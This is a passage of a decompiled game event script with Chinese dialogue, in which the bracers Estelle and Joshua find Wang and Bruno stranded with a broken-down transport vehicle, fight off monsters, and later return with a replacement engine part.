EventBegin(0x0)
OP_44(0x9, 0xFF)
OP_44(0x8, 0xFF)
Fade(1000)
OP_6D(-19410, 40, -38900, 0)
SetChrPos(0x101, -18990, 50, -38440, 180)
SetChrPos(0x102, -20320, 20, -39060, 135)
SetChrPos(0x107, -19090, 50, -36910, 180)
OP_6C(300000, 0)
OP_6B(3000, 0)
OP_4A(0x8, 255)
OP_4A(0x9, 255)
OP_0D()
ChrTalk(
0x8,
(
"呜~……\x01",
"难道出故障了吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"啊……\x01",
"看来的确是啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"偏偏坏在平原正中间,\x01",
"真是麻烦啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#501F请问这里是怎么了?\x02\x03",
"你们是不是遇到什么麻烦了?\x02",
)
)
CloseMessageWindow()
OP_62(0x8, 0x0, 2000, 0x26, 0x26, 0xFA, 0x1)
OP_62(0x9, 0x0, 2000, 0x26, 0x26, 0xFA, 0x1)
TurnDirection(0x8, 0x101, 400)
TurnDirection(0x9, 0x101, 400)
Sleep(400)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAF, 4)), scpexpr(EXPR_END)), "loc_315")
ChrTalk(
0x8,
(
"啊啊,我以为是谁呢……\x01",
"原来是艾丝蒂尔和约修亚啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F您好。\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F很久不见了。\x02",
)
CloseMessageWindow()
TurnDirection(0x9, 0x8, 400)
ChrTalk(
0x9,
"是认识的人吗?\x02",
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"嗯,\x01",
"他们和我一样也是游击士。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F不过我们还只是准游击士。\x01",
" \x02",
)
)
CloseMessageWindow()
TurnDirection(0x9, 0x101, 400)
Jump("loc_499")
label("loc_315")
ChrTalk(
0x9,
(
"怎么了?\x01",
"你们几个……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
"咦?那个徽章……\x02",
)
CloseMessageWindow()
ChrTalk(
0x8,
"难道说你们是……\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#006F嗯,对啊,\x01",
"我们是准游击士。\x02\x03",
"我叫艾丝蒂尔,\x01",
"旁边的那位是……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F我叫约修亚,请多指教。\x02",
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"哟,\x01",
"这么年轻就当上游击士了啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
"对了,你们就是传说中的……\x02",
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"请多指教,我叫王,\x01",
"是蔡斯支部所属的游击士。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"你们的事情,\x01",
"我在雾香小姐那里听说过。\x02",
)
)
CloseMessageWindow()
label("loc_499")
ChrTalk(
0x8,
(
"可是你们\x01",
"为什么会到这里来呢?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F啊,是这样的。\x01",
"我们正在护送这个女孩。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#060F啊,是的。\x01",
"我要去一趟亚尔摩村……\x02\x03",
"所以就让艾丝蒂尔姐姐她们送我过去。\x01",
" \x02",
)
)
CloseMessageWindow()
TurnDirection(0x9, 0x107, 400)
ChrTalk(
0x9,
(
"哦,我就说在哪儿见过你,\x01",
"你不是提妲小妹妹吗。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"又是博士叫你去的吧?\x01",
"每次要你去做的事情都很辛苦呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
"#067F呵呵…………\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F……王先生,\x01",
"你们在这里做什么呢?\x02\x03",
"刚才看你们的样子,\x01",
"好像遇到了什么麻烦吧。\x02",
)
)
CloseMessageWindow()
TurnDirection(0x9, 0x101, 400)
ChrTalk(
0x8,
"啊,是的。\x02",
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"我们打算把运输车\x01",
"护送到沃尔费堡垒去……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"刚走到这里\x01",
"车子就突然出毛病了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"我想应该是\x01",
"导力引擎出了故障。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"刚开始发出咔嗒咔嗒的声音时,\x01",
"我还以为是路况不平引起的。\x02",
)
)
CloseMessageWindow()
TurnDirection(0x101, 0x9, 400)
ChrTalk(
0x101,
"#003F哎呀,这可就麻烦了。\x02",
)
CloseMessageWindow()
Jc((scpexpr(EXPR_EXEC_OP, "OP_29(0x28, 0x0, 0x2)"), scpexpr(EXPR_END)), "loc_93A")
OP_62(0x101, 0x0, 2000, 0x26, 0x26, 0xFA, 0x1)
Sleep(400)
ChrTalk(
0x101,
(
"#002F啊,说起来……\x02\x03",
"公告板上有一个寻找运输车的委托。\x01",
" \x02\x03",
"难道说就是王先生你们这辆吗?\x01",
" \x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#012F嗯,应该就是。\x02",
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"这样啊……\x01",
"原来协会也开始找我们了……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#063F唔~可是……\x01",
"是导力引擎出了故障。\x02\x03",
"如果是这个原因,\x01",
"那么不把内部用的\x01",
"驱动导力器全部更换掉是不行的。\x02",
)
)
CloseMessageWindow()
Jump("loc_993")
label("loc_93A")
ChrTalk(
0x107,
(
"#063F是导力引擎的故障吗?\x02\x03",
"那么不把内部用的\x01",
"驱动导力器全部更换掉是不行的。\x02",
)
)
CloseMessageWindow()
label("loc_993")
def lambda_999():
TurnDirection(0x102, 0x107, 400)
ExitThread()
QueueWorkItem(0x102, 1, lambda_999)
TurnDirection(0x101, 0x107, 400)
ChrTalk(
0x101,
(
"#004F啊…………?\x01",
"现在不能进行修理吗?\x02",
)
)
CloseMessageWindow()
TurnDirection(0x107, 0x101, 400)
ChrTalk(
0x107,
(
"#063F因为导力引擎的核心\x01",
"是极为精密的机械……\x02\x03",
"如果要拆开修理,\x01",
"就必须有相应的设备。\x02\x03",
"只用简单的工具是无从下手的。\x01",
" \x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#013F原来如此。\x02\x03",
"要在室外修理的确是比较困难。\x01",
" \x02\x03",
"#012F………………嗯!?\x02",
)
)
CloseMessageWindow()
OP_20(0x5DC)
OP_62(0x102, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_8C(0x102, 215, 400)
Sleep(800)
OP_21()
OP_1D(0x56)
def lambda_B1D():
TurnDirection(0x8, 0x102, 400)
ExitThread()
QueueWorkItem(0x8, 1, lambda_B1D)
def lambda_B2B():
TurnDirection(0x107, 0x102, 400)
ExitThread()
QueueWorkItem(0x107, 1, lambda_B2B)
def lambda_B39():
TurnDirection(0x9, 0x102, 400)
ExitThread()
QueueWorkItem(0x9, 1, lambda_B39)
TurnDirection(0x101, 0x102, 400)
ChrTalk(
0x101,
"#002F怎、怎么了?\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
"#012F嗯,这个感觉是……\x02",
)
CloseMessageWindow()
def lambda_B8A():
OP_6D(-27480, -30, -42850, 3000)
ExitThread()
QueueWorkItem(0x11, 1, lambda_B8A)
def lambda_BA2():
OP_6C(270000, 3000)
ExitThread()
QueueWorkItem(0x11, 2, lambda_BA2)
Sleep(700)
ClearChrFlags(0xA, 0x80)
SetChrChipByIndex(0xA, 8)
SetChrPos(0xA, -26150, -50, -46240, 45)
ClearChrFlags(0xB, 0x80)
SetChrChipByIndex(0xB, 8)
SetChrPos(0xB, -27650, 30, -47100, 45)
ClearChrFlags(0xC, 0x80)
SetChrChipByIndex(0xC, 8)
SetChrPos(0xC, -28470, -90, -45180, 45)
ClearChrFlags(0xD, 0x80)
SetChrChipByIndex(0xD, 8)
SetChrPos(0xD, -30510, -30, -44920, 45)
ClearChrFlags(0xE, 0x80)
SetChrChipByIndex(0xE, 8)
SetChrPos(0xE, -29310, -90, -43270, 45)
ClearChrFlags(0xF, 0x80)
SetChrChipByIndex(0xF, 8)
SetChrPos(0xF, -30380, 0, -46760, 45)
OP_43(0xA, 0x1, 0x1, 0x4)
OP_43(0xC, 0x1, 0x1, 0x6)
OP_43(0xE, 0x1, 0x1, 0x8)
OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x8, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
def lambda_C9C():
OP_8C(0x8, 270, 400)
ExitThread()
QueueWorkItem(0x8, 1, lambda_C9C)
def lambda_CAA():
OP_8C(0x101, 215, 400)
ExitThread()
QueueWorkItem(0x101, 1, lambda_CAA)
Sleep(150)
OP_62(0x9, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x107, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
def lambda_CEB():
OP_8C(0x9, 270, 400)
ExitThread()
QueueWorkItem(0x9, 1, lambda_CEB)
def lambda_CF9():
OP_8C(0x107, 215, 400)
ExitThread()
QueueWorkItem(0x107, 1, lambda_CF9)
OP_43(0xB, 0x1, 0x1, 0x5)
OP_43(0xD, 0x1, 0x1, 0x7)
Sleep(100)
SetChrChipByIndex(0x101, 3)
SetChrChipByIndex(0x102, 9)
SetChrChipByIndex(0x8, 5)
SetChrChipByIndex(0x107, 13)
OP_43(0xF, 0x1, 0x1, 0x9)
WaitChrThread(0xF, 0x1)
def lambda_D3A():
OP_6D(-21250, -20, -39110, 1500)
ExitThread()
QueueWorkItem(0x11, 1, lambda_D3A)
OP_62(0x9, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
Sleep(120)
OP_62(0x107, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
WaitChrThread(0x11, 0x1)
OP_94(0x1, 0x9, 0xB4, 0xC8, 0x3E8, 0x0)
ChrTalk(
0x9,
"魔、魔兽!?\x02",
)
CloseMessageWindow()
ClearChrFlags(0x14, 0x80)
SetChrChipByIndex(0x14, 8)
SetChrPos(0x14, -22130, -40, -48120, 26)
SetChrFlags(0x14, 0x4)
OP_51(0x14, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_4A(0x14, 0)
SetChrSubChip(0x14, 4)
OP_96(0x14, 0xFFFFAC90, 0x7D0, 0xFFFF4F2A, 0x898, 0x1388)
SetChrChipByIndex(0x14, 7)
OP_4B(0x14, 0)
def lambda_DF5():
OP_6D(-19870, -30, -41930, 1000)
ExitThread()
QueueWorkItem(0x11, 1, lambda_DF5)
def lambda_E0D():
OP_6C(180000, 1500)
ExitThread()
QueueWorkItem(0x11, 2, lambda_E0D)
OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
TurnDirection(0x101, 0x14, 400)
WaitChrThread(0x11, 0x2)
ChrTalk(
0x101,
"#005F王先生!上面!\x02",
)
CloseMessageWindow()
OP_62(0x8, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
TurnDirection(0x8, 0x14, 400)
SetChrChipByIndex(0x14, 8)
OP_8E(0x14, 0xFFFFB17C, 0x7D0, 0xFFFF572C, 0x1B58, 0x0)
OP_51(0x14, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_4A(0x14, 0)
SetChrSubChip(0x14, 4)
OP_62(0x9, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
def lambda_EBB():
label("loc_EBB")
TurnDirection(0x9, 0x14, 400)
OP_48()
Jump("loc_EBB")
QueueWorkItem2(0x9, 1, lambda_EBB)
OP_22(0xA3, 0x0, 0x64)
def lambda_ED1():
OP_96(0x14, 0xFFFFB302, 0xFFFFFFD8, 0xFFFF5E52, 0x64, 0x1388)
ExitThread()
QueueWorkItem(0x14, 1, lambda_ED1)
OP_51(0x14, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(200)
OP_43(0x8, 0x1, 0x1, 0xD)
Sleep(120)
OP_44(0x14, 0xFF)
SetChrFlags(0x14, 0x20)
SetChrFlags(0x14, 0x4)
SetChrFlags(0x14, 0x40)
PlayEffect(0x8, 0xFF, 0x14, 0, 2000, 0, 0, 0, 0, 900, 900, 900, 0xFF, 0, 0, 0, 0)
SetChrChipByIndex(0x14, 2)
SetChrSubChip(0x14, 0)
OP_8F(0x14, 0xFFFFB0F0, 0x320, 0xFFFF5BDC, 0x1F40, 0x0)
PlayEffect(0x12, 0xFF, 0xFF, -20370, 800, -42730, 0, 0, 0, 2000, 2000, 2000, 0xFF, 0, 0, 0, 0)
SetChrPos(0x14, -20240, 1000, -42020, 0)
OP_51(0x14, 0x2A, (scpexpr(EXPR_PUSH_LONG, 0x7530), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_51(0x14, 0x2B, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_51(0x14, 0x2C, (scpexpr(EXPR_PUSH_LONG, 0xFFFF15A0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_51(0x14, 0x2D, (scpexpr(EXPR_PUSH_LONG, 0x3E8), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_51(0x14, 0x2E, (scpexpr(EXPR_PUSH_LONG, 0x3E8), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_51(0x14, 0x2F, (scpexpr(EXPR_PUSH_LONG, 0x3E8), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_43(0x14, 0x3, 0x1, 0xF)
OP_43(0x14, 0x2, 0x1, 0x10)
Sleep(400)
OP_96(0xB, 0xFFFF98FE, 0xFFFFFFBA, 0xFFFF50D8, 0x1F4, 0xBB8)
WaitChrThread(0x14, 0x2)
WaitChrThread(0x8, 0x1)
OP_44(0x9, 0x1)
OP_44(0x14, 0x3)
OP_62(0x9, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
ChrTalk(
0x9,
"#1P哇、哇哦!\x02",
)
CloseMessageWindow()
TurnDirection(0x101, 0xC, 400)
SetChrChipByIndex(0x8, 5)
TurnDirection(0x8, 0xB, 400)
OP_4B(0x8, 0)
ChrTalk(
0x8,
"#1P布鲁诺先生,请退后!\x02",
)
CloseMessageWindow()
ChrTalk(
0x9,
"#1P哦、哦!\x02",
)
CloseMessageWindow()
OP_62(0x9, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
def lambda_10A9():
OP_8E(0x9, 0xFFFFC09A, 0xFFFFFFE2, 0xFFFF6640, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0x9, 1, lambda_10A9)
def lambda_10C4():
OP_6D(-15540, -50, -40250, 2000)
ExitThread()
QueueWorkItem(0x14, 1, lambda_10C4)
ClearChrFlags(0x11, 0x80)
SetChrChipByIndex(0x11, 8)
SetChrPos(0x11, -19100, -30, -50010, 43)
ClearChrFlags(0x12, 0x80)
SetChrChipByIndex(0x12, 8)
SetChrPos(0x12, -19100, -30, -50010, 43)
ClearChrFlags(0x13, 0x80)
SetChrChipByIndex(0x13, 8)
SetChrPos(0x13, -19100, -30, -50010, 43)
OP_43(0x11, 0x1, 0x1, 0xA)
Sleep(400)
OP_43(0x12, 0x1, 0x1, 0xB)
Sleep(400)
OP_43(0x13, 0x1, 0x1, 0xC)
OP_62(0x9, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
TurnDirection(0x9, 0x12, 400)
OP_95(0x9, 0x0, 0x0, 0x0, 0x320, 0x2EE0)
def lambda_1181():
OP_6D(-19630, 60, -38120, 2000)
ExitThread()
QueueWorkItem(0x14, 1, lambda_1181)
OP_62(0x9, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
OP_8E(0x9, 0xFFFFBBD6, 0x0, 0xFFFF6D66, 0xBB8, 0x0)
TurnDirection(0x9, 0x12, 400)
WaitChrThread(0x14, 0x1)
ChrTalk(
0x9,
(
"哇、哇~!\x01",
"后面也来了!\x02",
)
)
CloseMessageWindow()
OP_62(0x8, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Sleep(120)
OP_62(0x107, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
def lambda_1235():
TurnDirection(0xFE, 0x12, 400)
ExitThread()
QueueWorkItem(0x101, 1, lambda_1235)
def lambda_1243():
TurnDirection(0xFE, 0x12, 400)
ExitThread()
QueueWorkItem(0x107, 1, lambda_1243)
TurnDirection(0x8, 0x12, 400)
ChrTalk(
0x8,
"………………嗯?!\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#012F王先生,\x01",
"后面的就拜托你了!\x02\x03",
"这边的就由我们来对付。\x01",
" \x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
"#1P好、好的……放心吧!\x02",
)
CloseMessageWindow()
def lambda_12C0():
OP_8C(0xFE, 215, 400)
ExitThread()
QueueWorkItem(0x101, 1, lambda_12C0)
OP_8C(0x107, 215, 400)
ChrTalk(
0x101,
(
"#005F好!\x01",
"交给我们吧!\x02",
)
)
CloseMessageWindow()
OP_62(0x107, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
SetChrChipByIndex(0xA, 8)
SetChrChipByIndex(0xB, 8)
SetChrChipByIndex(0xC, 8)
SetChrChipByIndex(0xD, 8)
SetChrChipByIndex(0xE, 8)
SetChrChipByIndex(0xF, 8)
def lambda_133E():
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_133E)
def lambda_1354():
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xB, 1, lambda_1354)
def lambda_136A():
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xC, 1, lambda_136A)
def lambda_1380():
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xD, 1, lambda_1380)
def lambda_1396():
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xE, 1, lambda_1396)
def lambda_13AC():
OP_94(0x1, 0xFE, 0x0, 0xFA0, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xF, 1, lambda_13AC)
SetChrChipByIndex(0x8, 6)
SetChrFlags(0x8, 0x40)
SetChrFlags(0x8, 0x1000)
OP_43(0x8, 0x1, 0x1, 0xE)
WaitChrThread(0x8, 0x1)
OP_44(0xA, 0xFF)
OP_44(0xB, 0xFF)
OP_44(0xC, 0xFF)
OP_44(0xD, 0xFF)
OP_44(0xE, 0xFF)
OP_44(0xF, 0xFF)
OP_44(0x11, 0xFF)
OP_44(0x12, 0xFF)
OP_44(0x13, 0xFF)
OP_44(0x14, 0xFF)
OP_44(0x8, 0xFF)
OP_44(0x9, 0xFF)
OP_44(0x101, 0xFF)
OP_44(0x102, 0xFF)
OP_44(0x107, 0xFF)
ClearChrFlags(0x8, 0x40)
ClearChrFlags(0x9, 0x40)
ClearChrFlags(0x8, 0x1000)
Battle(0x3F6, 0x0, 0x0, 0x0, 0xFF)
Switch(
(scpexpr(EXPR_PUSH_VALUE_INDEX, 0x3), scpexpr(EXPR_END)),
(1, "loc_143B"),
(SWITCH_DEFAULT, "loc_143E"),
)
label("loc_143B")
OP_B4(0x0)
Return()
label("loc_143E")
EventBegin(0x0)
FadeToBright(1000, 0)
OP_6D(-18050, 20, -37820, 0)
OP_6B(3000, 0)
OP_6C(180000, 0)
SetChrFlags(0xA, 0x80)
SetChrFlags(0xB, 0x80)
SetChrFlags(0xC, 0x80)
SetChrFlags(0xD, 0x80)
SetChrFlags(0xE, 0x80)
SetChrFlags(0xF, 0x80)
SetChrFlags(0x11, 0x80)
SetChrFlags(0x12, 0x80)
SetChrFlags(0x13, 0x80)
SetChrFlags(0x14, 0x80)
SetChrPos(0x8, -17230, 10, -39580, 104)
SetChrPos(0x9, -17250, 20, -36060, 199)
SetChrPos(0x101, -18990, 50, -38440, 225)
SetChrPos(0x102, -20320, 20, -39060, 225)
SetChrPos(0x107, -19090, 50, -36910, 225)
SetChrChipByIndex(0x101, 3)
SetChrChipByIndex(0x102, 9)
SetChrChipByIndex(0x107, 13)
SetChrChipByIndex(0x8, 5)
OP_0D()
Sleep(400)
ChrTalk(
0x101,
(
"#002F大家总算都平安无事了……\x01",
" \x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#012F嗯,已经把它们击退了。\x02",
)
CloseMessageWindow()
SetChrChipByIndex(0x107, 65535)
TurnDirection(0x107, 0x101, 400)
ChrTalk(
0x107,
"#561F呼……太好了~\x02",
)
CloseMessageWindow()
SetChrChipByIndex(0x8, 0)
TurnDirection(0x8, 0x101, 400)
ChrTalk(
0x8,
(
"还好大家都\x01",
"没受到任何伤害。\x02",
)
)
CloseMessageWindow()
SetChrChipByIndex(0x101, 65535)
SetChrChipByIndex(0x102, 65535)
def lambda_15BF():
TurnDirection(0x102, 0x8, 400)
ExitThread()
QueueWorkItem(0x102, 1, lambda_15BF)
TurnDirection(0x101, 0x8, 400)
ChrTalk(
0x9,
"呼~捡回一条命啊。\x02",
)
CloseMessageWindow()
def lambda_1609():
OP_8C(0x101, 90, 400)
ExitThread()
QueueWorkItem(0x101, 1, lambda_1609)
def lambda_1617():
OP_8C(0x107, 135, 400)
ExitThread()
QueueWorkItem(0x107, 1, lambda_1617)
def lambda_1625():
OP_6C(270000, 3500)
ExitThread()
QueueWorkItem(0xA, 1, lambda_1625)
def lambda_1635():
OP_6D(-18530, 50, -38340, 3500)
ExitThread()
QueueWorkItem(0xA, 2, lambda_1635)
SetChrFlags(0x9, 0x40)
OP_43(0x102, 0x1, 0x1, 0x11)
OP_8E(0x9, 0xFFFFBB18, 0xA, 0xFFFF718A, 0x3E8, 0x0)
OP_8E(0x9, 0xFFFFBE10, 0xFFFFFFF6, 0xFFFF6A32, 0x3E8, 0x0)
TurnDirection(0x9, 0x102, 400)
ClearChrFlags(0x9, 0x40)
WaitChrThread(0xA, 0x1)
WaitChrThread(0xA, 0x2)
OP_44(0x101, 0xFF)
OP_44(0x107, 0xFF)
ChrTalk(
0x9,
(
"嗯…………\x01",
"虽然得救了,\x01",
"但是还要考虑接下来怎么做。\x02",
)
)
CloseMessageWindow()
TurnDirection(0x9, 0x102, 400)
ChrTalk(
0x8,
"嗯,是啊。\x02",
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"首先,无论如何\x01",
"也要让这个运输车动起来才行。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#003F可是,\x01",
"刚刚不是已经说过不能修理了吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#063F唔~\x01",
"我觉得的确很困难。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#012F这么说来……\x01",
"除了更换零件以外,\x01",
"的确已经没有其他办法了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"运输车的管理员是\x01",
"中央工房的普罗梅笛。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"只要问问他,\x01",
"应该可以知道更换用的零件的保管场所……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"可是,要做到这一点,\x01",
"就必须要回蔡斯一趟。\x02",
)
)
CloseMessageWindow()
TurnDirection(0x8, 0x9, 400)
ChrTalk(
0x8,
(
"嗯~真头疼啊。\x01",
"布鲁诺先生,怎么办?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
"要回蔡斯去吗?\x02",
)
CloseMessageWindow()
TurnDirection(0x9, 0x8, 400)
ChrTalk(
0x9,
(
"我认为现在还没这必要,\x01",
"还是再稍微摆弄一下这车子吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"能动的话当然是最好了。\x01",
"如果实在是动不了,\x01",
"也就只有回蔡斯去了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
"这样啊…………\x02",
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"那就暂时\x01",
"先呆在这里吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
"嗯,只有这样了。\x02",
)
CloseMessageWindow()
TurnDirection(0x8, 0x101, 400)
TurnDirection(0x9, 0x101, 400)
ChrTalk(
0x8,
(
"就是这么回事,\x01",
"我们要留在这里\x01",
"继续努力试试。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#002F嗯,我知道了……\x01",
"王先生你们要注意安全哦。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
"没问题,我不会蛮干的。\x02",
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"一旦有什么危险,\x01",
"我们会立刻返回城里的。\x02",
)
)
CloseMessageWindow()
TurnDirection(0x8, 0x107, 400)
ChrTalk(
0x8,
(
"那么,提妲小妹妹,\x01",
"你们去亚尔摩的路上也要小心。\x02",
)
)
CloseMessageWindow()
TurnDirection(0x107, 0x8, 400)
ChrTalk(
0x107,
"#060F啊,好的。\x02",
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"如果你们有空的话,\x01",
"请帮忙联络一下普罗梅笛。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"他应该一直都在中央工房\x01",
"三楼的设计室里面。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F嗯,那再见吧。\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F王先生你们务必要注意安全。\x01",
" \x02",
)
)
CloseMessageWindow()
Sleep(100)
OP_22(0x17, 0x0, 0x64)
FadeToDark(300, 0, 100)
SetMessageWindowPos(-1, -1, -1, -1)
SetChrName("")
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x2),
"任务【寻找运输车】\x07\x00",
"完成!\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
SetMessageWindowPos(72, 320, 56, 3)
OP_43(0x8, 0x1, 0x1, 0x12)
OP_43(0x9, 0x1, 0x1, 0x13)
Sleep(100)
OP_28(0x28, 0x4, 0x4)
OP_28(0x28, 0x4, 0x2)
OP_28(0x28, 0x4, 0x10)
OP_28(0x28, 0x1, 0x1)
OP_28(0x28, 0x1, 0x2)
OP_28(0x28, 0x1, 0x4)
OP_28(0x28, 0x1, 0x8)
OP_28(0x28, 0x1, 0x10)
OP_28(0x28, 0x1, 0x20)
OP_28(0x29, 0x4, 0x4)
OP_28(0x29, 0x4, 0x2)
EventEnd(0x0)
ClearChrFlags(0x8, 0x10)
ClearChrFlags(0x9, 0x10)
OP_43(0x9, 0x0, 0x0, 0x2)
OP_43(0x8, 0x0, 0x0, 0x2)
Return()
# Function_2_AC end
def Function_3_1CD1(): pass
label("Function_3_1CD1")
EventBegin(0x0)
OP_44(0x9, 0xFF)
OP_44(0x8, 0xFF)
Fade(1000)
OP_6D(-19410, 40, -38900, 0)
SetChrPos(0x101, -18990, 50, -38440, 180)
SetChrPos(0x102, -20320, 20, -39060, 135)
SetChrPos(0x107, -19090, 50, -36910, 180)
OP_6C(300000, 0)
OP_6B(3000, 0)
OP_4A(0x8, 255)
OP_4A(0x9, 255)
OP_0D()
ChrTalk(
0x101,
"#000F呼~久等了~\x02",
)
CloseMessageWindow()
ClearChrFlags(0x8, 0x10)
ClearChrFlags(0x9, 0x10)
TurnDirection(0x8, 0x101, 400)
TurnDirection(0x9, 0x101, 400)
ChrTalk(
0x8,
"哦,艾丝蒂尔、约修亚。\x02",
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"怎么样?\x01",
"导力引擎\x01",
"已经找到了吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#001F嗯,已经找到了。\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F让你们久等了。\x02",
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"哦哦,就是这东西,\x01",
"哎呀,真是帮了大忙了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"你们走了之后\x01",
"我又想尽了各种办法……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"但是不管怎样\x01",
"还是没法让车子动起来。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"我们本来打算离开的。\x01",
"刚刚正准备商量\x01",
"回蔡斯的事情。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F是这样啊,\x01",
"我们能够赶上真是太好了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F那么就立刻修理运输车吧。\x01",
" \x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#060F啊,好的。\x02\x03",
"#061F交给我来办吧,\x01",
